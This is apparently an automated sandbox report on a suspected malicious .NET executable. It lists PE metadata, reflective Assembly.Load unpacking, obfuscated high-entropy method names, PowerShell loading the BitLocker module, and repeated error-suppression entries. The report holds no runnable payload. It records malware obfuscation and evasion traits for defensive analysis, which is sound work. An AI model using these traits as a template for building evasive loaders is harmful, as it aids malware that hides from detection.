Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: VbcXXnmIwPPhh.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: geWD.pdbSHA256 source: VbcXXnmIwPPhh.exe
Source:	Binary string: geWD.pdb source: VbcXXnmIwPPhh.exe

Data Obfuscation

.NET source code contains potential unpacker

Source: VbcXXnmIwPPhh.exe, Form1.cs	.Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
Source: 0.2.VbcXXnmIwPPhh.exe.32fd858.3.raw.unpack, JK.cs	.Net Code: ve System.Reflection.Assembly.Load(byte[])
Source: 0.2.VbcXXnmIwPPhh.exe.452ab00.5.raw.unpack, aTN0PgLVcauSVu2vqN.cs	.Net Code: W9s2BCu23c System.Reflection.Assembly.Load(byte[])
Source: 0.2.VbcXXnmIwPPhh.exe.7730000.8.raw.unpack, aTN0PgLVcauSVu2vqN.cs	.Net Code: W9s2BCu23c System.Reflection.Assembly.Load(byte[])
Source: 0.2.VbcXXnmIwPPhh.exe.32f4240.0.raw.unpack, JK.cs	.Net Code: ve System.Reflection.Assembly.Load(byte[])
Source: 0.2.VbcXXnmIwPPhh.exe.32a52e4.2.raw.unpack, JK.cs	.Net Code: ve System.Reflection.Assembly.Load(byte[])
Source: 0.2.VbcXXnmIwPPhh.exe.32ae8fc.1.raw.unpack, JK.cs	.Net Code: ve System.Reflection.Assembly.Load(byte[])
Source: 0.2.VbcXXnmIwPPhh.exe.5a60000.7.raw.unpack, JK.cs	.Net Code: ve System.Reflection.Assembly.Load(byte[])

Source: VbcXXnmIwPPhh.exe

Static PE information: 0xF6BE9C4F [Tue Mar 8 01:03:11 2101 UTC]

Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe	Code function: 0_2_0308EF83 push eax; iretd		0_2_0308EF89
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe	Code function: 6_2_06DF9241 push es; ret		6_2_06DF9244

Source: VbcXXnmIwPPhh.exe

Static PE information: section name: .text entropy: 7.877925712281058

Source: 0.2.VbcXXnmIwPPhh.exe.32fd858.3.raw.unpack, JK.cs	High entropy of concatenated method names: 'JK', 'Y3', 'Lv', 'F5', 'q9', 'Ou', 'NL', 'tg', 'Jy', 'kq'
Source: 0.2.VbcXXnmIwPPhh.exe.452ab00.5.raw.unpack, v7TfX0cN66hhgJUJwJ.cs	High entropy of concatenated method names: 'ToString', 'tYtEm3rlXp', 'vZaEZQIpk3', 'enfECqHPKk', 'TiREs4OPj4', 'V4sE1AleDf', 'o8jElDFfEH', 'X9YEXlv4sh', 'WhJE57XeeZ', 'sy4EguL75h'
Source: 0.2.VbcXXnmIwPPhh.exe.452ab00.5.raw.unpack, Ny32pHRu6f6w0bk14d.cs	High entropy of concatenated method names: 'EUQxy60RTE', 'GOrxOnVlIn', 'mxyaCSY16D', 'd7gasNaEoC', 'RYVa16poEv', 'ro7alD1Ytv', 'Pj2aX56jE5', 'nvRa5RHSuw', 'zaXagL67RF', 'ijHaM3PHBR'
Source: 0.2.VbcXXnmIwPPhh.exe.452ab00.5.raw.unpack, SjH6iEglMe4JJag9x8.cs	High entropy of concatenated method names: 'GTgTv7jFOs', 'g63T6gTtJJ', 'Un5TBFqG9v', 'RACTJMZ9bi', 'uDUTyXXH8o', 'ttpTIMn7My', 'ixwTOcamDV', 'U8FTGJyhTc', 'DRgT0oSJJc', 'vXTTRDyaMP'
Source: 0.2.VbcXXnmIwPPhh.exe.452ab00.5.raw.unpack, fLnSLcQsburVYyKgWh.cs	High entropy of concatenated method names: 'pIb9MloKhA', 'btn94NtaLA', 'mTK9QfZnoS', 'wRd9894dcU', 'ET59Z9xoO7', 'xL09CQygcx', 'qP89sdBucM', 'Rwp91lgwXE', 'fPj9ls0GM0', 'nks9XUYwAO'
Source: 0.2.VbcXXnmIwPPhh.exe.452ab00.5.raw.unpack, rlPD0bXvfvPTrMIcH5.cs	High entropy of concatenated method names: 'e65TwXhNAU', 'w7ATay3otw', 'vrOTr8r1hQ', 'c6drog7VmU', 'QRvrzRjDHx', 'D5mTdY4DOy', 'XJwTi8ol6A', 'Et7TtSsUv7', 'c1ETWhxGlJ', 'it6T2gL70U'
Source: 0.2.VbcXXnmIwPPhh.exe.452ab00.5.raw.unpack, LL8myueE5FL4FwPBUS.cs	High entropy of concatenated method names: 'IGY7wAn8xX', 'SMf7bnNiMM', 'gai7aBcGKZ', 'gYU7xa46mf', 'Tai7ri1XLD', 'RWM7Tud8cw', 'S477LeGX0v', 'oWQ7jDfCfk', 'X567VkWFsL', 'qgK7k0yM4F'
Source: 0.2.VbcXXnmIwPPhh.exe.452ab00.5.raw.unpack, aTN0PgLVcauSVu2vqN.cs	High entropy of concatenated method names: 'x2HWAJrm7n', 'YRBWwTlYhH', 'NITWbSnOJ8', 'oykWaLIb5Y', 'QgSWx7XFW1', 'el2WrcOKqI', 'IlEWTQlXkN', 'XqqWLYjyje', 'AZZWjYFYgF', 'eZoWVEVCrl'
Source: 0.2.VbcXXnmIwPPhh.exe.452ab00.5.raw.unpack, nH6PHboIq1eMy9lsOx.cs	High entropy of concatenated method names: 'ackui3ikbG', 'gSuuWAk9xU', 'vdRu2MdvAZ', 'SFIuws18kO', 'yPpub68xXI', 'OkEuxOlrHJ', 'zp8urCGwpj', 'kWA7FodH4s', 'kgH7eVO1XV', 'ktZ7DwkVEe'
Source: 0.2.VbcXXnmIwPPhh.exe.452ab00.5.raw.unpack, kUuY6siW5vyxdHktXRf.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'lNPfQMtMH6', 'fkjf8cg9YX', 'CT4fc0NUBi', 'F4vfU3T65j', 'Py4fnEdgPE', 'TU0fSVvsBc', 'PXIfFg2SIF'
Source: 0.2.VbcXXnmIwPPhh.exe.452ab00.5.raw.unpack, KdrMBNtPmnWruc2Qo7.cs	High entropy of concatenated method names: 'bNhBtReFj', 'YwuJEL0k0', 'STtIOekSi', 'TA5O2Qx0W', 'Uwx0i4UAw', 'SKZRHMqIX', 'FaWcWiVd8IfEJwL3Zh', 'aP4F1ZkeqAoDHx4Lni', 'hY17K8DD4', 'YC2fqW3vm'
Source: 0.2.VbcXXnmIwPPhh.exe.452ab00.5.raw.unpack, eRvY0DhwwMDag3tMd8.cs	High entropy of concatenated method names: 'kEKrAhwBHI', 'QSIrbFKx8p', 'ktdrxpX7HE', 'J8drTrlP1a', 'NQZrLqnoFZ', 'Ddvxn0inuX', 'uhsxSNldTl', 'uZmxFBsHXU', 'yk3xe1MXrB', 'eqtxDwg8Hs'
Source: 0.2.VbcXXnmIwPPhh.exe.452ab00.5.raw.unpack, L6vjyKid9aDaoe5HiaO.cs	High entropy of concatenated method names: 'tKYuvg3uhQ', 'dkau6uePqw', 'LNruBiEWeX', 'bvEuJGXBRD', 'JXvuy30LoP', 'i90uII0vV5', 'OpSuOBSVNI', 'VUEuG1wI7u', 'pYqu0SUl47', 'GmmuRirhCu'
Source: 0.2.VbcXXnmIwPPhh.exe.452ab00.5.raw.unpack, p94yMyHuCERHsEo3os.cs	High entropy of concatenated method names: 'UsUKGd1mkt', 'U6CK0pf1S0', 'S3PKhLWoSg', 'UerKZ8wgdv', 'aD9KsVHUvx', 'SaAK1fhsGJ', 'vllKXTUJdY', 'AOYK5k7Qcf', 'WbUKM7gBsa', 'uhFKmU0jCt'
Source: 0.2.VbcXXnmIwPPhh.exe.452ab00.5.raw.unpack, HBDxB2GmiOduxajCiD.cs	High entropy of concatenated method names: 'VG8bQdamFt', 'Mcsb8Neh6h', 'j76bcyQceC', 'rqobUIVvGH', 'GOmbn1VCfa', 'XEBbSAXcxL', 'cY6bFGmfXk', 'rZ0be0CNYh', 'FPbbDSgUqK', 'NdcbonGkta'
Source: 0.2.VbcXXnmIwPPhh.exe.452ab00.5.raw.unpack, qHKnAkDX8ytgCp1mSc.cs	High entropy of concatenated method names: 'XcY7hRUl9B', 'Lf07Z6ZgBh', 'dTS7CjD8xQ', 'I7x7s45AYg', 'XK67QEMgwi', 'M0i719PkGi', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.VbcXXnmIwPPhh.exe.452ab00.5.raw.unpack, sjbL9g05wUgikYyDq1.cs	High entropy of concatenated method names: 'm27aJnf468', 'bAfaI74f6b', 'JqVaGiBOTZ', 'Cfsa0q7xQy', 'eDra9nnYur', 'qUOaENg53T', 'l30aN5OS2T', 'ttJa7hxU2t', 'I0FauJhQu3', 'VNAafHbWpQ'
Source: 0.2.VbcXXnmIwPPhh.exe.452ab00.5.raw.unpack, XOPcij2EZTlP5u1gAE.cs	High entropy of concatenated method names: 'oiZiTBDxB2', 'OiOiLduxaj', 'N5wiVUgikY', 'ADqik1gy32', 'gk1i94dARv', 'v0DiEwwMDa', 'h9K238GjxV4a826a1t', 'AXiI3JJh6XSFe6oQp7', 'waYiijekAY', 'AEpiW4fqTH'
Source: 0.2.VbcXXnmIwPPhh.exe.452ab00.5.raw.unpack, qiNcDkbGW6sJO9UAgD.cs	High entropy of concatenated method names: 'Dispose', 'p7uiDLa8Py', 'MSFtZuGERn', 'TOyqqR1KP0', 'P5Lio8myuE', 'MFLiz4FwPB', 'ProcessDialogKey', 'TS7tdHKnAk', 'K8ytitgCp1', 'OScttkH6PH'
Source: 0.2.VbcXXnmIwPPhh.exe.7730000.8.raw.unpack, v7TfX0cN66hhgJUJwJ.cs	High entropy of concatenated method names: 'ToString', 'tYtEm3rlXp', 'vZaEZQIpk3', 'enfECqHPKk', 'TiREs4OPj4', 'V4sE1AleDf', 'o8jElDFfEH', 'X9YEXlv4sh', 'WhJE57XeeZ', 'sy4EguL75h'
Source: 0.2.VbcXXnmIwPPhh.exe.7730000.8.raw.unpack, Ny32pHRu6f6w0bk14d.cs	High entropy of concatenated method names: 'EUQxy60RTE', 'GOrxOnVlIn', 'mxyaCSY16D', 'd7gasNaEoC', 'RYVa16poEv', 'ro7alD1Ytv', 'Pj2aX56jE5', 'nvRa5RHSuw', 'zaXagL67RF', 'ijHaM3PHBR'
Source: 0.2.VbcXXnmIwPPhh.exe.7730000.8.raw.unpack, SjH6iEglMe4JJag9x8.cs	High entropy of concatenated method names: 'GTgTv7jFOs', 'g63T6gTtJJ', 'Un5TBFqG9v', 'RACTJMZ9bi', 'uDUTyXXH8o', 'ttpTIMn7My', 'ixwTOcamDV', 'U8FTGJyhTc', 'DRgT0oSJJc', 'vXTTRDyaMP'
Source: 0.2.VbcXXnmIwPPhh.exe.7730000.8.raw.unpack, fLnSLcQsburVYyKgWh.cs	High entropy of concatenated method names: 'pIb9MloKhA', 'btn94NtaLA', 'mTK9QfZnoS', 'wRd9894dcU', 'ET59Z9xoO7', 'xL09CQygcx', 'qP89sdBucM', 'Rwp91lgwXE', 'fPj9ls0GM0', 'nks9XUYwAO'
Source: 0.2.VbcXXnmIwPPhh.exe.7730000.8.raw.unpack, rlPD0bXvfvPTrMIcH5.cs	High entropy of concatenated method names: 'e65TwXhNAU', 'w7ATay3otw', 'vrOTr8r1hQ', 'c6drog7VmU', 'QRvrzRjDHx', 'D5mTdY4DOy', 'XJwTi8ol6A', 'Et7TtSsUv7', 'c1ETWhxGlJ', 'it6T2gL70U'
Source: 0.2.VbcXXnmIwPPhh.exe.7730000.8.raw.unpack, LL8myueE5FL4FwPBUS.cs	High entropy of concatenated method names: 'IGY7wAn8xX', 'SMf7bnNiMM', 'gai7aBcGKZ', 'gYU7xa46mf', 'Tai7ri1XLD', 'RWM7Tud8cw', 'S477LeGX0v', 'oWQ7jDfCfk', 'X567VkWFsL', 'qgK7k0yM4F'
Source: 0.2.VbcXXnmIwPPhh.exe.7730000.8.raw.unpack, aTN0PgLVcauSVu2vqN.cs	High entropy of concatenated method names: 'x2HWAJrm7n', 'YRBWwTlYhH', 'NITWbSnOJ8', 'oykWaLIb5Y', 'QgSWx7XFW1', 'el2WrcOKqI', 'IlEWTQlXkN', 'XqqWLYjyje', 'AZZWjYFYgF', 'eZoWVEVCrl'
Source: 0.2.VbcXXnmIwPPhh.exe.7730000.8.raw.unpack, nH6PHboIq1eMy9lsOx.cs	High entropy of concatenated method names: 'ackui3ikbG', 'gSuuWAk9xU', 'vdRu2MdvAZ', 'SFIuws18kO', 'yPpub68xXI', 'OkEuxOlrHJ', 'zp8urCGwpj', 'kWA7FodH4s', 'kgH7eVO1XV', 'ktZ7DwkVEe'
Source: 0.2.VbcXXnmIwPPhh.exe.7730000.8.raw.unpack, kUuY6siW5vyxdHktXRf.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'lNPfQMtMH6', 'fkjf8cg9YX', 'CT4fc0NUBi', 'F4vfU3T65j', 'Py4fnEdgPE', 'TU0fSVvsBc', 'PXIfFg2SIF'
Source: 0.2.VbcXXnmIwPPhh.exe.7730000.8.raw.unpack, KdrMBNtPmnWruc2Qo7.cs	High entropy of concatenated method names: 'bNhBtReFj', 'YwuJEL0k0', 'STtIOekSi', 'TA5O2Qx0W', 'Uwx0i4UAw', 'SKZRHMqIX', 'FaWcWiVd8IfEJwL3Zh', 'aP4F1ZkeqAoDHx4Lni', 'hY17K8DD4', 'YC2fqW3vm'
Source: 0.2.VbcXXnmIwPPhh.exe.7730000.8.raw.unpack, eRvY0DhwwMDag3tMd8.cs	High entropy of concatenated method names: 'kEKrAhwBHI', 'QSIrbFKx8p', 'ktdrxpX7HE', 'J8drTrlP1a', 'NQZrLqnoFZ', 'Ddvxn0inuX', 'uhsxSNldTl', 'uZmxFBsHXU', 'yk3xe1MXrB', 'eqtxDwg8Hs'
Source: 0.2.VbcXXnmIwPPhh.exe.7730000.8.raw.unpack, L6vjyKid9aDaoe5HiaO.cs	High entropy of concatenated method names: 'tKYuvg3uhQ', 'dkau6uePqw', 'LNruBiEWeX', 'bvEuJGXBRD', 'JXvuy30LoP', 'i90uII0vV5', 'OpSuOBSVNI', 'VUEuG1wI7u', 'pYqu0SUl47', 'GmmuRirhCu'
Source: 0.2.VbcXXnmIwPPhh.exe.7730000.8.raw.unpack, p94yMyHuCERHsEo3os.cs	High entropy of concatenated method names: 'UsUKGd1mkt', 'U6CK0pf1S0', 'S3PKhLWoSg', 'UerKZ8wgdv', 'aD9KsVHUvx', 'SaAK1fhsGJ', 'vllKXTUJdY', 'AOYK5k7Qcf', 'WbUKM7gBsa', 'uhFKmU0jCt'
Source: 0.2.VbcXXnmIwPPhh.exe.7730000.8.raw.unpack, HBDxB2GmiOduxajCiD.cs	High entropy of concatenated method names: 'VG8bQdamFt', 'Mcsb8Neh6h', 'j76bcyQceC', 'rqobUIVvGH', 'GOmbn1VCfa', 'XEBbSAXcxL', 'cY6bFGmfXk', 'rZ0be0CNYh', 'FPbbDSgUqK', 'NdcbonGkta'
Source: 0.2.VbcXXnmIwPPhh.exe.7730000.8.raw.unpack, qHKnAkDX8ytgCp1mSc.cs	High entropy of concatenated method names: 'XcY7hRUl9B', 'Lf07Z6ZgBh', 'dTS7CjD8xQ', 'I7x7s45AYg', 'XK67QEMgwi', 'M0i719PkGi', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.VbcXXnmIwPPhh.exe.7730000.8.raw.unpack, sjbL9g05wUgikYyDq1.cs	High entropy of concatenated method names: 'm27aJnf468', 'bAfaI74f6b', 'JqVaGiBOTZ', 'Cfsa0q7xQy', 'eDra9nnYur', 'qUOaENg53T', 'l30aN5OS2T', 'ttJa7hxU2t', 'I0FauJhQu3', 'VNAafHbWpQ'
Source: 0.2.VbcXXnmIwPPhh.exe.7730000.8.raw.unpack, XOPcij2EZTlP5u1gAE.cs	High entropy of concatenated method names: 'oiZiTBDxB2', 'OiOiLduxaj', 'N5wiVUgikY', 'ADqik1gy32', 'gk1i94dARv', 'v0DiEwwMDa', 'h9K238GjxV4a826a1t', 'AXiI3JJh6XSFe6oQp7', 'waYiijekAY', 'AEpiW4fqTH'
Source: 0.2.VbcXXnmIwPPhh.exe.7730000.8.raw.unpack, qiNcDkbGW6sJO9UAgD.cs	High entropy of concatenated method names: 'Dispose', 'p7uiDLa8Py', 'MSFtZuGERn', 'TOyqqR1KP0', 'P5Lio8myuE', 'MFLiz4FwPB', 'ProcessDialogKey', 'TS7tdHKnAk', 'K8ytitgCp1', 'OScttkH6PH'
Source: 0.2.VbcXXnmIwPPhh.exe.32f4240.0.raw.unpack, JK.cs	High entropy of concatenated method names: 'JK', 'Y3', 'Lv', 'F5', 'q9', 'Ou', 'NL', 'tg', 'Jy', 'kq'
Source: 0.2.VbcXXnmIwPPhh.exe.32a52e4.2.raw.unpack, JK.cs	High entropy of concatenated method names: 'JK', 'Y3', 'Lv', 'F5', 'q9', 'Ou', 'NL', 'tg', 'Jy', 'kq'
Source: 0.2.VbcXXnmIwPPhh.exe.32ae8fc.1.raw.unpack, JK.cs	High entropy of concatenated method names: 'JK', 'Y3', 'Lv', 'F5', 'q9', 'Ou', 'NL', 'tg', 'Jy', 'kq'
Source: 0.2.VbcXXnmIwPPhh.exe.5a60000.7.raw.unpack, JK.cs	High entropy of concatenated method names: 'JK', 'Y3', 'Lv', 'F5', 'q9', 'Ou', 'NL', 'tg', 'Jy', 'kq'

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior

Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\VbcXXnmIwPPhh.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
